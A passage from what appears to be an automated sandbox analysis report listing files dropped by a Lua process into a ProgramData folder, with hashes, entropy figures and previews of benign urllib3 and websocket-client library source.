SSDEEP:	96:D32cO6oSxdCyJrs0o9JhTEDfmg3zkK7h3dSnPXW4Xdbnr6atK:DGR6oSXCydo9jymgwKtABZr6
MD5:	79224141DF1EEBFB42F87D6F481ACCD6
SHA1:	BD24F3BD1206768F9F7906EBC684B744F49AEC99
SHA-256:	645488A97D02E968B38B179C0A1677FE8932BBB044BF4959BB5553D2CEA1E123
SHA-512:	F47157A8757E58DF43F5E80E1990390CE838C601A0926882FB9A6D39A3901641B68B64122FEF115E53ACE3F1E808A24B99384AA0E1F4A75F33708F5AC76A5A8A
Malicious:	false
Preview:	from __future__ import absolute_import..from .filepost import encode_multipart_formdata.from .packages.six.moves.urllib.parse import urlencode..__all__ = ["RequestMethods"]...class RequestMethods(object):. """. Convenience mixin for classes who implement a :meth:`urlopen` method, such. as :class:`urllib3.HTTPConnectionPool` and. :class:`urllib3.PoolManager`... Provides behavior for making common types of HTTP request methods and. decides which type of request field encoding to use... Specifically,.. :meth:`.request_encode_url` is for sending requests whose fields are. encoded in the URL (such as GET, HEAD, DELETE)... :meth:`.request_encode_body` is for sending requests whose fields are. encoded in the body of the request using multipart or www-form-urlencoded. (such as for POST, PUT, PATCH)... :meth:`.request` is for making any kind of request, it will look up the. appropriate encoding format and use one of the above two methods to make. t

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\response.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	28203
Entropy (8bit):	4.251150113482539
Encrypted:	false
SSDEEP:	384:JYJr/YVfkk796iiO107JI1ecsnS6qB6sQv7bza7igXgPJ:MWkk796iXM4BDOR
MD5:	20AAD3A3250C966F461EAB386F8D69C7
SHA1:	C4012C35A9A92FE942984F53F16759106022C487
SHA-256:	846846061ED3904921FC8420E42D56FF1B8F36B8082AFE415173F213EAB42EE1
SHA-512:	43779D8858BF0723B690DB76E76497A968EE2F2A5F00FD7240B8A3FFAC8719D63E85EAB60B3BA60617A9A23E3C6DAFCED844052A9556A284B06B9FDC29DEB622
Malicious:	false
Preview:	from __future__ import absolute_import..import io.import logging.import zlib.from contextlib import contextmanager.from socket import error as SocketError.from socket import timeout as SocketTimeout..try:. import brotli.except ImportError:. brotli = None..from ._collections import HTTPHeaderDict.from .connection import BaseSSLError, HTTPException.from .exceptions import (. BodyNotHttplibCompatible,. DecodeError,. HTTPError,. IncompleteRead,. InvalidChunkLength,. InvalidHeader,. ProtocolError,. ReadTimeoutError,. ResponseNotChunked,. SSLError,.).from .packages import six.from .util.response import is_fp_closed, is_response_to_head..log = logging.getLogger(__name__)...class DeflateDecoder(object):. def __init__(self):. self._first_try = True. self._data = b"". self._obj = zlib.decompressobj().. def __getattr__(self, name):. return getattr(self._obj, name).. def decompress(self, data):. if not data:.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\util\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.83746578234033
Encrypted:	false
SSDEEP:	24:1R23fEVkSyG/TfgZ2G1lVZjY/ukxvt5U12MydsFtrB5cNuQOt4TJAAJxj:P+8ynGs1JjY/ukdX32FtrB5cNyKT6sj
MD5:	F951FB1888473EE32752499CE9B841A5
SHA1:	896463BCD6481C029DE1EF982B1F532942FA6B02
SHA-256:	2449929A6AAA2F26B0F0FE75814226661F06C20F62D7349EF83A2A022B67DA77
SHA-512:	FBB614667E169337204758BCF053EB65E55560BBB9A70CD749CF90F59059DB20C4419C999C1086754DF9D5C2306F9562262C689A8F49EC869309DABC5B6E547B
Malicious:	false
Preview:	from __future__ import absolute_import..# For backwards compatibility, provide imports that used to be here..from .connection import is_connection_dropped.from .request import SKIP_HEADER, SKIPPABLE_HEADERS, make_headers.from .response import is_fp_closed.from .retry import Retry.from .ssl_ import (. ALPN_PROTOCOLS,. HAS_SNI,. IS_PYOPENSSL,. IS_SECURETRANSPORT,. PROTOCOL_TLS,. SSLContext,. assert_fingerprint,. resolve_cert_reqs,. resolve_ssl_version,. ssl_wrap_socket,.).from .timeout import Timeout, current_time.from .url import Url, get_host, parse_url, split_first.from .wait import wait_for_read, wait_for_write..__all__ = (. "HAS_SNI",. "IS_PYOPENSSL",. "IS_SECURETRANSPORT",. "SSLContext",. "PROTOCOL_TLS",. "ALPN_PROTOCOLS",. "Retry",. "Timeout",. "Url",. "assert_fingerprint",. "current_time",. "is_connection_dropped",. "is_fp_closed",. "get_host",. "parse_url",. "make_headers",. "resolve_cert_reqs",.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\util\connection.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4910
Entropy (8bit):	4.618922443378174
Encrypted:	false
SSDEEP:	96:4hZ6A4yu4N1QdNwwStdwcWTy1IPCSgR4omvqm5BoQ/nQo:fquI6cqomvqm3/Qo
MD5:	198952B1C54770B4D536B273D3188A63
SHA1:	947BC92B65E28FE065FC3168894ECEF3DBBD7368
SHA-256:	DB507E2D7D1CF1F9313C3B2CC8709A2B4A429E6ACA9A196D839128A2E1E200F5
SHA-512:	9EB274294A084059E55D9992D081CE0D4BD7B1EC6768B84F69ABD4E98D406B79F7F7D3759E1F47292D4A1B19FF39D3E55C20C7FB2B945F066E5F91A375653EDD
Malicious:	false
Preview:	from __future__ import absolute_import..import socket..from urllib3.exceptions import LocationParseError..from ..contrib import _appengine_environ.from ..packages import six.from .wait import NoWayToWaitForSocketError, wait_for_read...def is_connection_dropped(conn): # Platform-specific. """. Returns True if the connection is dropped and should be closed... :param conn:. :class:`http.client.HTTPConnection` object... Note: For platforms like AppEngine, this will always return ``False`` to. let the platform handle connection recycling transparently for us.. """. sock = getattr(conn, "sock", False). if sock is False: # Platform-specific: AppEngine. return False. if sock is None: # Connection already closed (such as by httplib).. return True. try:. # Returns True if readable, which here means it's been dropped. return wait_for_read(sock, timeout=0.0). except NoWayToWaitForSocketError: # Platform-specific: AppEngine.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\util\proxy.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	4.494869995325611
Encrypted:	false
SSDEEP:	48:FaHRE8L38awee8CfdO2MG89dWysSd2SIv/gBe:OHLMhB8DN1wSI8e
MD5:	396E22D494BEB890973D959127DCBCF6
SHA1:	E6AA3913A30B6855373C8341A46584AA72592AC7
SHA-256:	1468A90049EF66D7B295D5CD8DC7B80C407B633C14F9AE657A9F32E52D2A1D08
SHA-512:	1118613463F8EFFA20DBE21EFFC82D2981A24E469323E93A2CAF5CBE5B5B5546E90FD115C3F5D5E25D01BC94FBB52B11448E0EB199572416549C527C9C8FE98B
Malicious:	false
Preview:	from .ssl_ import create_urllib3_context, resolve_cert_reqs, resolve_ssl_version...def connection_requires_http_tunnel(. proxy_url=None, proxy_config=None, destination_scheme=None.):. """. Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). """. # If we're not using a proxy, no way to use a tunnel.. if proxy_url is None:. return False.. # HTTP destinations never require tunneling, we always forward.. if destination_scheme == "http":. return False.. # Support for forwarding with HTTPS proxies and HTTPS destinations.. if (. proxy_url.scheme == "https". and proxy_config. and proxy_config.use_forwarding_for_https. ):. return False.. # Otherwise always use a t

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\util\queue.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	498
Entropy (8bit):	4.477353837826609
Encrypted:	false
SSDEEP:	12:bxtt3eX2xS2l1sQNkwQOlxtf52B1FwznOwk5J2MbRl9Z5:btOE1kS521wzOj
MD5:	716426931AFAD092EC0A85983BA6D094
SHA1:	F768307325C0240B5C595BB79E618D87FE4016CB
SHA-256:	9D1817F3F797FBF564BF1A17D3DE905A8CFC3ECD101D4004C482C263FECF9DC3
SHA-512:	9D3EF19DA6ED7579964793BDCA023C88CA94A7209D095F1BE3305F85DFB3B83250DBD232BA0A72FD71CE5BE9A01C5AD7F58575ACBC1EC50660509FDBA4FA1917
Malicious:	false
Preview:	import collections..from ..packages import six.from ..packages.six.moves import queue..if six.PY2:. # Queue is imported for side effects on MS Windows. See issue #229.. import Queue as _unused_module_Queue # noqa: F401...class LifoQueue(queue.Queue):. def _init(self, _):. self.queue = collections.deque().. def _qsize(self, len=len):. return len(self.queue).. def _put(self, item):. self.queue.append(item).. def _get(self):. return self.queue.pop().

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\util\request.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4123
Entropy (8bit):	4.718834362210168
Encrypted:	false
SSDEEP:	48:PeJqcpzHVITTuYQa0ivYufSYzEE3g7wxQLGNotuE3ynoBUAn7Mi6dZvAxcW:W+TCYQ87fSJqSGNpENUAw/lu
MD5:	BBDCDEBC576390CA97484C5EAF6CE32B
SHA1:	591222AD61CAE8DAB7D3E3ABC0C3783476831711
SHA-256:	367CDA10A4353DABB0E4C14C57A1E68043072137F402E6BD7D0BB38B6B99CC67
SHA-512:	1F7995C92FEA20E6F7A6895A504BDC40D80DADC9ADD982D2D3CF7BC1C1556F9655AF3DB34E1BE20FF4EE99599175CE1B3D097132D10DCE225019B3D685FAA3D2
Malicious:	false
Preview:	from __future__ import absolute_import..from base64 import b64encode..from ..exceptions import UnrewindableBodyError.from ..packages.six import b, integer_types..# Pass as a value within ``headers`` to skip.# emitting some HTTP headers that are added automatically..# The only headers that are supported are ``Accept-Encoding``,.# ``Host``, and ``User-Agent``..SKIP_HEADER = "@@@SKIP_HEADER@@@".SKIPPABLE_HEADERS = frozenset(["accept-encoding", "host", "user-agent"])..ACCEPT_ENCODING = "gzip,deflate".try:. import brotli as _unused_module_brotli # noqa: F401.except ImportError:. pass.else:. ACCEPT_ENCODING += ",br".._FAILEDTELL = object()...def make_headers(. keep_alive=None,. accept_encoding=None,. user_agent=None,. basic_auth=None,. proxy_basic_auth=None,. disable_cache=None,.):. """. Shortcuts for generating request headers... :param keep_alive:. If ``True``, adds 'connection: keep-alive' header... :param accept_encoding:. Can be a bo

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\util\response.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3510
Entropy (8bit):	4.529413035203953
Encrypted:	false
SSDEEP:	48:PYn1uZLY0GS9PpvNYKzamS7gkLgUCj0bp0FFN1SH8Qnt5JxWCkARhzE6nZwDQ1m8:uuK0HPpv1Nb5MGFU/JOChzB08
MD5:	6EB83504356CF0A5778199247F39E6CA
SHA1:	A3B6DD229AA3B2BE1A4148673A7A68D51EA53024
SHA-256:	189A60DC4822F6A6895D1C01879C2FF8C36E4566A7E4122EE34A117A8C563F6F
SHA-512:	E0B3F698B7AF3098526395E440CBAC30882EEFC5CDB9CAE0FAE166888B9C6546CC67176A1AEE50761E66FD6941A046645CA714A28E4CA09D75569C85A58ED2AB
Malicious:	false
Preview:	from __future__ import absolute_import..from email.errors import MultipartInvariantViolationDefect, StartBoundaryNotFoundDefect..from ..exceptions import HeaderParsingError.from ..packages.six.moves import http_client as httplib...def is_fp_closed(obj):. """. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. """.. try:. # Check `isclosed()` first, in case Python3 doesn't set `closed`.. # GH Issue #928. return obj.isclosed(). except AttributeError:. pass.. try:. # Check via the official file-like-object way.. return obj.closed. except AttributeError:. pass.. try:. # Check if the object is a container for another file-like object that. # gets released on exhaustion (e.g. HTTPResponse).. return obj.fp is None. except AttributeError:. pass.. raise ValueError("Unable to determine whether fp is closed.")...def assert_header_parsi

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\util\retry.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21366
Entropy (8bit):	4.471614497073468
Encrypted:	false
SSDEEP:	192:nlSPFWV8FCR/EMIjKVabMI9eF1iruuciXjyy+2IyyMT9hRvF3OmXJeBArZcd02Zs:nltngYiKuD+2Bb14C7zuOUY
MD5:	56033476FF40D4B73732F9B9434FBC1F
SHA1:	A5C677FBF482ED4F04B8BEC5C16586471A4D92A0
SHA-256:	B67D7AF070CC5329C599744FFAE55A2D150E95B4C426292807546E65DC1F09EB
SHA-512:	8030B15706B5416D04C6F9C5AAEECE9F394F012FA76AB44FBF39DFFBEDAB876D160F3E3CCC512707D9D3DC83E1AE084BB55C2041E1C28A423B8E13A6E1C3E3A1
Malicious:	false
Preview:	from __future__ import absolute_import..import email.import logging.import re.import time.import warnings.from collections import namedtuple.from itertools import takewhile..from ..exceptions import (. ConnectTimeoutError,. InvalidHeader,. MaxRetryError,. ProtocolError,. ProxyError,. ReadTimeoutError,. ResponseError,.).from ..packages import six..log = logging.getLogger(__name__)...# Data structure for representing the metadata of requests that result in a retry..RequestHistory = namedtuple(. "RequestHistory", ["method", "url", "error", "status", "redirect_location"].)...# TODO: In v2 we can remove this sentinel and metaclass with deprecated options.._Default = object()...class _RetryMeta(type):. @property. def DEFAULT_METHOD_WHITELIST(cls):. warnings.warn(. "Using 'Retry.DEFAULT_METHOD_WHITELIST' is deprecated and ". "will be removed in v2.0. Use 'Retry.DEFAULT_METHODS_ALLOWED' instead",. DeprecationWarning,.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\util\ssl_.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16269
Entropy (8bit):	4.765216998658318
Encrypted:	false
SSDEEP:	384:U1hF9n1WeSX+g42d1x15M+WQhorfCd20M051b964asyKU1Je2kO81:U1nsO+58w751dyKH
MD5:	08DFD0769D93F4C1ADCB71E58978A831
SHA1:	FDC60DEA75574E47660ABAE5F53AA1C3C69547EA
SHA-256:	7D1AB3466A0B7E20EFE7FB45CE016D1B394EBAE1E82D7D2EB3B5947FBB580C0A
SHA-512:	EBBFE389C0AFD1584C3A86CFA9161723250424046A4920E8E63986363A089848BD7B68D6D75E303B5826B381B588EFA5C1A17BBCB2C613213B5AAA035E3B066E
Malicious:	false
Preview:	from __future__ import absolute_import..import hmac.import os.import sys.import warnings.from binascii import hexlify, unhexlify.from hashlib import md5, sha1, sha256..from ..exceptions import (. InsecurePlatformWarning,. ProxySchemeUnsupported,. SNIMissingWarning,. SSLError,.).from ..packages import six.from .url import BRACELESS_IPV6_ADDRZ_RE, IPV4_RE..SSLContext = None.SSLTransport = None.HAS_SNI = False.IS_PYOPENSSL = False.IS_SECURETRANSPORT = False.ALPN_PROTOCOLS = ["http/1.1"]..# Maps the length of a digest to a possible hash function producing this digest.HASHFUNC_MAP = {32: md5, 40: sha1, 64: sha256}...def _const_compare_digest_backport(a, b):. """. Compare two digests of equal length in constant time... The digests must be of type str/bytes.. Returns True if the digests match, and False otherwise.. """. result = abs(len(a) - len(b)). for left, right in zip(bytearray(a), bytearray(b)):. result \|= left ^ right. return result == 0..._co

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\util\ssltransport.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6908
Entropy (8bit):	4.391414095369072
Encrypted:	false
SSDEEP:	192:z3cuDlXsMobpIIo86Nm0a7OyrsoLYs9TQau:z3lDlcVblJ7rs0K
MD5:	46CB3A651596C72D376DF5CAF77778EE
SHA1:	33781AA0CD4C484674AB2EC6C5D42E5D30E8892E
SHA-256:	22F190BECF585A47F88F37EA5634EEFD45A3C005203E7E4072D6A35BC54BCFA0
SHA-512:	5AC1DFB72B8CF4308CCFB91F7C9EDCC0B8EAC7EB4FFECB473D7F22BCD192BAB2EC40F40B4877FA03436E647355AEB789D9BF81D5D50AEF9293B0D950898FCB7A
Malicious:	false
Preview:	import io.import socket.import ssl..from urllib3.exceptions import ProxySchemeUnsupported.from urllib3.packages import six..SSL_BLOCKSIZE = 16384...class SSLTransport:. """. The SSLTransport wraps an existing socket and establishes an SSL connection... Contrary to Python's implementation of SSLSocket, it allows you to chain. multiple TLS connections together. It's particularly useful if you need to. implement TLS within TLS... The class supports most of the socket API operations.. """.. @staticmethod. def _validate_ssl_context_for_tls_in_tls(ssl_context):. """. Raises a ProxySchemeUnsupported if the provided ssl_context can't be used. for TLS in TLS... The only requirement is that the ssl_context provides the 'wrap_bio'. methods.. """.. if not hasattr(ssl_context, "wrap_bio"):. if six.PY2:. raise ProxySchemeUnsupported(. "TLS in TLS requires SSLContext.wrap_bio() whi

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\util\timeout.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10003
Entropy (8bit):	4.377726266005605
Encrypted:	false
SSDEEP:	192:76N+l/u6i7m8bo7pB2GmyqqQnqXAzBCsQioKA16:+m/u6gz6XGmAIHM
MD5:	218E02C0402E7A5E184139FF531D3E0B
SHA1:	D5D9516F82A53640CC647649AA893E172E3D9A2C
SHA-256:	4126C150D381F7287A0270E7EB54AB2D0D21839A33D08F7EB97106F75009B888
SHA-512:	A42DC4578C90BA18C36ECB88982E14A165E9B367D55106D05AA8FF67B4471094111E826559FBF637C20CA4B7910D0EDAB8B39BAE3E12F11BC15948A1678CF390
Malicious:	false
Preview:	from __future__ import absolute_import..import time..# The default socket timeout, used by httplib to indicate that no timeout was.# specified by the user.from socket import _GLOBAL_DEFAULT_TIMEOUT..from ..exceptions import TimeoutStateError..# A sentinel value to indicate that no timeout was specified by the user in.# urllib3._Default = object()...# Use time.monotonic if available..current_time = getattr(time, "monotonic", time.time)...class Timeout(object):. """Timeout configuration... Timeouts can be defined as a default for a pool:.. .. code-block:: python.. timeout = Timeout(connect=2.0, read=7.0). http = PoolManager(timeout=timeout). response = http.request('GET', 'http://example.com/').. Or per-request (which overrides the default for the pool):.. .. code-block:: python.. response = http.request('GET', 'http://example.com/', timeout=Timeout(10)).. Timeouts can be disabled by setting all the parameters to ``None``:.. .. code-block:: py

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\util\url.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13964
Entropy (8bit):	4.925309276465452
Encrypted:	false
SSDEEP:	384:jGBavLWmblA2uqSHMXN5ts+RsF6dpO/weGehxgOO12j:jG4uLHMPWV6dmrhxgVc
MD5:	AA0F32A3B0875A42BFDDFA041478151D
SHA1:	B2B901441D2ED077166D6EBF37B9A2AD6F117A60
SHA-256:	2D67CB4A523897616650C29F0A412509A5B5D3ED0DFAC2434FD6F1683649923B
SHA-512:	94942674D68B5C876EC4CD84B352128FC146052BB1A29F4BA98858174D15E3ADD6A6F3A3AD2D77FDECCE2892447B8201EA89BD7557B3CC728783360C9CC3620A
Malicious:	false
Preview:	from __future__ import absolute_import..import re.from collections import namedtuple..from ..exceptions import LocationParseError.from ..packages import six..url_attrs = ["scheme", "auth", "host", "port", "path", "query", "fragment"]..# We only want to normalize urls with an HTTP(S) scheme..# urllib3 infers URLs without a scheme (None) to be http..NORMALIZABLE_SCHEMES = ("http", "https", None)..# Almost all of these patterns were derived from the.# 'rfc3986' module: https://github.com/python-hyper/rfc3986.PERCENT_RE = re.compile(r"%[a-fA-F0-9]{2}").SCHEME_RE = re.compile(r"^(?:[a-zA-Z][a-zA-Z0-9+-]:\|/)").URI_RE = re.compile(. r"^(?:([a-zA-Z][a-zA-Z0-9+.-]):)?". r"(?://([^\\/?#]))?". r"([^?#])". r"(?:\?([^#]))?". r"(?:#(.))?$",. re.UNICODE \| re.DOTALL,.)..IPV4_PAT = r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}".HEX_PAT = "[0-9A-Fa-f]{1,4}".LS32_PAT = "(?:{hex}:{hex}\|{ipv4})".format(hex=HEX_PAT, ipv4=IPV4_PAT)._subs = {"hex": HEX_PAT, "ls32": LS32_PAT}._variations = [. #

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\util\wait.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5404
Entropy (8bit):	4.537715119236964
Encrypted:	false
SSDEEP:	96:Y2n0jQGAov2Rq9rFKYuBArDu8V1lwcycJR8c8WR9qgP8LjBGdisassAEgaYAEDn:YE0jQGf9hKorDuKec86T0LjBxsad2D
MD5:	82B9B6D02400D9557437CDE11E4E645C
SHA1:	9018DDB7A08DE962F331A42745EF3BC186FBFF77
SHA-256:	DCC50A452014243076B60728EEA454B245B4CD7180598BD1444E10D7FEB194BB
SHA-512:	8E363897776E38C7585373E4F45C146799A7537360F3CD0AA47D5F0558211C636929F741669864BC96CD5DC9BF14ADAE9E39F2704B1E4C7F62870E5D25695330
Malicious:	false
Preview:	import errno.import select.import sys.from functools import partial..try:. from time import monotonic.except ImportError:. from time import time as monotonic..__all__ = ["NoWayToWaitForSocketError", "wait_for_read", "wait_for_write"]...class NoWayToWaitForSocketError(Exception):. pass...# How should we wait on sockets?.#.# There are two types of APIs you can use for waiting on sockets: the fancy.# modern stateful APIs like epoll/kqueue, and the older stateless APIs like.# select/poll. The stateful APIs are more efficient when you have a lots of.# sockets to keep track of, because you can set them up once and then use them.# lots of times. But we only ever want to wait on a single socket at a time.# and don't want to keep track of state, so the stateless APIs are actually.# more efficient. So we want to use select() or poll()..#.# Now, how do we choose between select() and poll()? On traditional Unixes,.# select() has a strange calling convention that makes it slow, or fail.# a

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1022
Entropy (8bit):	4.888060403280485
Encrypted:	false
SSDEEP:	24:BZtSHO7yNF5byfOkHeUHTbVoGz+t0qBtxcSv:xuOuN/byJHOGLqBTT
MD5:	AA286D6C0381F509F1926C5F91DDB7CA
SHA1:	C453C9B5A15DE1FA74F711BBF61C01234822A793
SHA-256:	EF1BE3CD9F2D59E811E23F720A9BFAE839976A79A2B707D97FD1FA2F145CDED7
SHA-512:	EC05BD0196D0A7CEA0811EDD7118F28C34852C7DAAC5D545363CF3704686A4A7C9FB6CCD1304A1BF70720687F9D32329637FAF459B98A3564067E0F63D825B88
Malicious:	false
Preview:	""".websocket - WebSocket client library for Python..Copyright (C) 2010 Hiroki Ohtani(liris).. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 51 Franklin Street, Fifth Floor,. Boston, MA 02110-1335 USA..""".from ._abnf import .from ._app import WebSocketApp.from ._core import .from ._exceptions import .from ._logging import .from ._socket import *.._

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\_abnf.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13791
Entropy (8bit):	4.81246191493597
Encrypted:	false
SSDEEP:	192:vuQ5KhhiAiKQEYms7gbU99EOjY41N5zhPS/VVuo9IPBiIN0/:vuQ5KPTQvmvU99LjY41PzhPS/Vco6P8t
MD5:	0FB55C9DFB1ED3F6A44BFD9AB848007D
SHA1:	C3745AC0968AFD2ACF0CC5B9999445E6F8F52F2B
SHA-256:	9D286B4D1267E56BCB1B529C01DB1F536288C038C7B73160A4F498F61161E8C4
SHA-512:	1DBC5E5FC454C2C3E36A6FA3B2E17193BE7482D89ED07D9B8485447657100EECA8C7E2DF5E1625555F6D86B5226D8C0762087D45F2C18BF7DD1B487F0D108D18
Malicious:	false
Preview:	""".websocket - WebSocket client library for Python..Copyright (C) 2010 Hiroki Ohtani(liris).. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 51 Franklin Street, Fifth Floor,. Boston, MA 02110-1335 USA..""".import array.import os.import struct..import six..from ._exceptions import *.from ._utils import validate_utf8.from threading import Lock..try:. i

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\_app.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13733
Entropy (8bit):	4.319593412815257
Encrypted:	false
SSDEEP:	192:vuQ56Sx8xjkB8oOV9zU/V1dFQzWlesmQjFoNM1IePtKbJ75hlZ:vuQ5Kj0tMx5hz
MD5:	89CB01A230D4BA9BAEF21152184A493F
SHA1:	A7459F520A8C630E260093675E130628AC43F145
SHA-256:	EB074F70251BC01C2E066C9A02DD6F991BFE68C6212A93913175C9F9ACE2C28A
SHA-512:	D5777AC2D79EF205814A8679D94485C332A952B5A7BECC0F1C2CECA250B4FD5F0BBA031228DAB498529394735E26FB5B84D0AC44A93DFC30E3AE0472CCB25DE3
Malicious:	false
Preview:	""".websocket - WebSocket client library for Python..Copyright (C) 2010 Hiroki Ohtani(liris).. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 51 Franklin Street, Fifth Floor,. Boston, MA 02110-1335 USA.."""..""".WebSocketApp provides higher level APIs..""".import inspect.import select.import sys.import threading.import time.import traceback..import six..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\_cookiejar.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1797
Entropy (8bit):	3.983029026414856
Encrypted:	false
SSDEEP:	48:79UmpfrxK7Zgs1F8KmpfrxK72N+zSkRaEM59KaNe4Kc89n:79UmpfRmmpf78aT5tNbKc89
MD5:	E97274F5268EE180F1742643EFE99673
SHA1:	30895368E050E27EC189D79719DA006117582C93
SHA-256:	C67C6E1FDB703AE6A01BEA304A4D2891F9DB5BC20DF7321A4A2BC9CCA98684EE
SHA-512:	20D9FD0D1B9231B15C0102BF231CB4786FF15078A3CE740D78906F4C83EF8C075DEF629FD1EFD3C899D56C04707E8918335ABF527AF95496D5D3E7F45509B384
Malicious:	false
Preview:	try:. import Cookie.except:. import http.cookies as Cookie...class SimpleCookieJar(object):. def __init__(self):. self.jar = dict().. def add(self, set_cookie):. if set_cookie:. try:. simpleCookie = Cookie.SimpleCookie(set_cookie). except:. simpleCookie = Cookie.SimpleCookie(set_cookie.encode('ascii', 'ignore')).. for k, v in simpleCookie.items():. domain = v.get("domain"). if domain:. if not domain.startswith("."):. domain = "." + domain. cookie = self.jar.get(domain) if self.jar.get(domain) else Cookie.SimpleCookie(). cookie.update(simpleCookie). self.jar[domain.lower()] = cookie.. def set(self, set_cookie):. if set_cookie:. try:. simpleCookie = Cookie.SimpleCookie(set_cookie). except:. simpleCookie = Cookie.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\_core.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17943
Entropy (8bit):	4.408871936567344
Encrypted:	false
SSDEEP:	192:vuQh52+JbkF+QeNLVf902Zw62GUa5H0uP+NR8Wm2Z0ilQMDVgO6W703MsOVvbuix:vuQLnJdLfYGUxyAZ6+0BOV
MD5:	98EB6E12461160AE67E7A362CB7EF772
SHA1:	89410C6C59C06BDD613B6836F3491ED7EBD7CE2B
SHA-256:	94BCF0C8F189107A4F5064A67F33F46E0A42F6DDB52DFE58DBBA2EE300818FEC
SHA-512:	E3EDD56F264C6F63FB3A4C06F7DF1CE60B28F7CC5BDEDAC6EB377125C052AD3160E0B4F4B12BD3E2632E1CC74F2623C73D3879888B9C81CE692A31F2B62D5C6A
Malicious:	false
Preview:	""".websocket - WebSocket client library for Python..Copyright (C) 2010 Hiroki Ohtani(liris).. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 51 Franklin Street, Fifth Floor,. Boston, MA 02110-1335 USA..""".from __future__ import print_function..import socket.import struct.import threading.import time..import six..# websocket modules.from ._abnf import *

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\_exceptions.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	4.756001399186266
Encrypted:	false
